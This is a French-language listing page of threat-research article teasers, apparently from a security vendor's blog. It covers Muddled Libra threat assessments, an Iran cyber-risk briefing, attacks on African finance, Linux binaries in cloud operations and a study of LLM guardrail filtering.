Groupes cybercriminels

Évaluation des menaces de Muddled Libra : un groupe plus puissant, plus rapide, plus redoutable
Lire l’article Right arrow
Pictorial representation of Iranian-backed threat groups and hacktivists. Digital illustration of a global network featuring interconnected lines and dots, suggesting a data-driven representation of worldwide connectivity, with a focus on technology and innovation. The image uses blue tones with red and light blue highlights.
Menaces de grande envergure

Briefing Menace – Hausse du cyber-risque lié à l’Iran (Mise à jour le 30 juin)
Lire l’article Right arrow
Pictorial illustration of cybercriminals. Illustration of a computer chip with a warning message "Network Hacked" displayed in a bright red alert triangle, surrounded by intricate digital elements and glowing lines, signifying a cybersecurity breach.
Recherche sur les menaces

Le secteur financier africain pris pour cible : comment les cybercriminels détournent des outils open source
Lire l’article Right arrow
Pictorial representation of . Vibrant futuristic cityscape with glowing neon lines, clouds, and a dramatic sky at twilight.
Recherche sur les menaces

L’évolution des binaires Linux dans les opérations ciblées sur le cloud
Lire l’article Right arrow
Pictorial representation of LLM content filtering efficacy. Two professionals working intently at computers in a modern office with digital graphs overlaying the image.
Recherche sur les menaces

Garde-fous des LLM : quelle efficacité ? Étude comparative des performances de filtrage des LLM chez les leaders de la GenAI
Lire l’article Right arrow
Pictorial representation of Muddled Libra (Scattered Spider). Illustration of a zodiac symbol Libra represented by scales, set against a cosmic purple background with stars.
Groupes cybercriminels

Évaluation de l’acteur malveillant Muddled Libra (Mise à jour du 16 mai 2025)
Lire l’article Right arrow
Enlarged Image

Recevez toutes les dernières infos, invitations à des évènements et alertes de sécurité

Default Heading

Read the article Right Arrow